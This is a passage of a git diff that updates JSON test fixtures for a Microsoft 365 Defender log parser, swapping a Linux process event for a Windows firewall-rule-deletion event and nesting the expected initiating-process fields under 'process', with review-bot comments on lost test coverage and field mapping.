@@ -1,9 +1,15 @@ { "input": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, 
\"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, 
\"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming 
traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating 
System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } }, "expected": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", 
\"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":18026
4,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "message": 
"{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account 
domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", "event": { "category": [ "process" 
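Review bot: This hunk swaps the fixture's Linux event (`/bin/ps`, null `InitiatingProcess*` and `AccountSid`, populated `MachineGroup`, POSIX `AdditionalFields`) for a Windows event instead of adding a second file, so the parser loses its only visible regression case for null initiating-process fields and non-Windows `AdditionalFields`. Keep the removed input/expected pair in its own fixture (for example `test_device_process_events_linux.json`, name to be chosen) and add the Windows sample as a new file, as this commit already does with `test_device_file_event_02.json`. The `sekoiaio.intake` block added to `input` here was absent from the removed version; if the test harness now requires it, the restored Linux fixture needs the same block.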
@@ -13,70 +19,119 @@
 "info"
 ]
 },
- "@timestamp": "2024-10-22T15:09:44.594155Z",
+ "@timestamp": "2024-11-08T14:38:51.907372Z",
 "action": {
 "properties": {
- "InitiatingProcessLogonId": "0",
- "LogonId": "0"
+ "AccountSid": "S-1-2-3",
+ "LogonId": "999",
+ "process": {
+ "IntegrityLevel": "System",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Network Command Shell",
+ "VersionInfoInternalFileName": "processcommand.exe",
+ "VersionInfoOriginalFileName": "processcommand.exe",
+ "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "VersionInfoProductVersion": "10.0.22621.1",
+ "parent": {
+ "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
+ "FileSize": 145408,
+ "IntegrityLevel": "System",
+ "LogonId": "999",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Windows\u00ae installer",
+ "VersionInfoInternalFileName": "file",
+ "VersionInfoOriginalFileName": "file.exe",
+ "VersionInfoProductName": "Windows Installer - Unicode",
+ "VersionInfoProductVersion": "5.0.22621.3880"
+ }
+ }
 },
 "type": "ProcessCreated"
 },
 "file": {
- "directory": "/usr/bin/ps",
+ "directory": "C:\\Windows\\processcommand.exe",
 "hash": {
- "md5": "098f6bcd4621d373cade4e832627b4f6",
- "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3",
- "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
+ "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+ "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+ "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
 },
- "name": "ps",
- "size": 144632
+ "name": "processcommand.exe",
+ "size": 82944
 },
 "host": {
- "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca",
- "name": "computer.intranet.example"
+ "id": "123456789abcdef",
+ "name": "host.group.local"
 },
 "microsoft": {
 "defender": {
 "report": {
- "id": "67417"
+ "id": "17318"
 }
 }
 },
 "process": {
 "args": [
- "--no-headers",
- "-A",
- "-o",
- "comm,pid,pcpu,pmem,rss,etimes"
+ "HTTP",
+ "advfirewall",
+ "delete",
+ "embedded",
+ "firewall",
+ "incoming",
+ "name=\"program=description=",
+ "rule",
+ "server",
+ "traffic\""
 ],
- "code_signature": {
- "status": "Unknown",
- "subject_name": "Unknown"
- },
- "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers",
+ "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"",
+ "name": "processcommand.exe",
 "parent": {
- "pid": 0
+ "args": [
+ "-Embedding",
+ "ABCDEF0123456789",
+ "E",
+ "Global\\HOST0000"
+ ],
+ "code_signature": {
+ "status": "Valid",
+ "subject_name": "OsVendor"
+ },
+ "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
+ "executable": "c:\\windows\\file.exe",
+ "hash": {
+ "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+ "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+ "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+ },
+ "name": "file.exe",
+ "pid": 10868,
+ "start": "2024-11-08T14:38:00.674494Z",
+ "user": {
+ "domain": "account domain",
+ "id": "S-1-2-3",
+ "name": "syst\u00e8me"
+ },
+ "working_directory": "c:\\windows"
 },
- "pid": 423627,
- "start": "2024-10-22T15:09:44.594155Z",
- "user": {
- "domain": "computer",
- "name": "root"
- }
+ "pid": 4520,
+ "start": "2024-11-08T14:38:51.903048Z",
+ "working_directory": "C:\\Windows"
 },
 "related": {
 "hash": [
- "098f6bcd4621d373cade4e832627b4f6",
- "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
- "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3"
+ "44543e0c6f30415c670c1322e61ca68602d58708",
+ "51a9cac9c4e8da44ffd7502be17604ee",
+ "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
+ "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
 ],
 "user": [
- "root"
+ "syst\u00e8me"
 ]
 },
 "user": {
- "domain": "computer",
- "name": "root"
+ "domain": "account domain",
+ "name": "syst\u00e8me"
 }
 }
 }
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
index 3fe0d2cf8..212f23549 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
@@ -16,17 +16,19 @@
 "@timestamp": "2023-01-04T14:35:20.616193Z",
 "action": {
 "properties": {
- "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
- "InitiatingProcessFileSize": 445440,
- "InitiatingProcessIntegrityLevel": "System",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
- "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
- "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client",
- "InitiatingProcessVersionInfoInternalFileName": "omadmclient",
- "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe",
- "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193",
- "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements"
+ "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements",
+ "process": {
+ "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
+ "FileSize": 445440,
+ "IntegrityLevel": "System",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Host Process for OMA-DM Client",
+ "VersionInfoInternalFileName": "omadmclient",
+ "VersionInfoOriginalFileName": "omadmclient.exe",
+ "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "VersionInfoProductVersion": "10.0.19041.2193"
+ }
 },
 "type": "RegistryKeyDeleted"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
index a04e0e8be..72f93da4e 100644
--- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
@@ -16,7 +16,11 @@
 "@timestamp": "2024-10-22T15:09:47.246794Z",
 "action": {
 "properties": {
- "InitiatingProcessLogonId": "0"
+ "process": {
+ "parent": {
+ "LogonId": "0"
+ }
+ }
 },
 "type": "ScriptContent"
 },
@@ -38,10 +42,9 @@
 },
 "process": {
 "parent": {
- "pid": 0
- },
- "pid": 423638,
- "start": "2024-10-22T15:09:47.165481Z"
+ "pid": 423638,
+ "start": "2024-10-22T15:09:47.165481Z"
+ }
 },
 "related": {
 "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json
index 294c92d60..5f3e9f9b1 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json
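Review bot: In both hunks of test_devices_events_script_content.json the initiating process is now filed under `process.parent` (`LogonId`, `pid` 423638, `start`) and `process` is left with no pid at all, whereas the RegistryKeyDeleted fixture in test_device_registry_events.json and the NtAllocateVirtualMemoryApiCall fixture in test_email_events.json map the same `InitiatingProcess*` fields to `process` itself. If this ScriptContent record comes from the same DeviceEvents table as those, the initiating process is the actor rather than its parent, and the expectation here would be encoding a swapped mapping; the input message is not in the hunk, so I cannot tell whether a separate `ProcessId` in it justifies the parent placement. Either way the parser should document which action types it treats as process-creation events, and this fixture should assert a `process.pid` if one is present in the input.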
@@ -17,16 +17,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
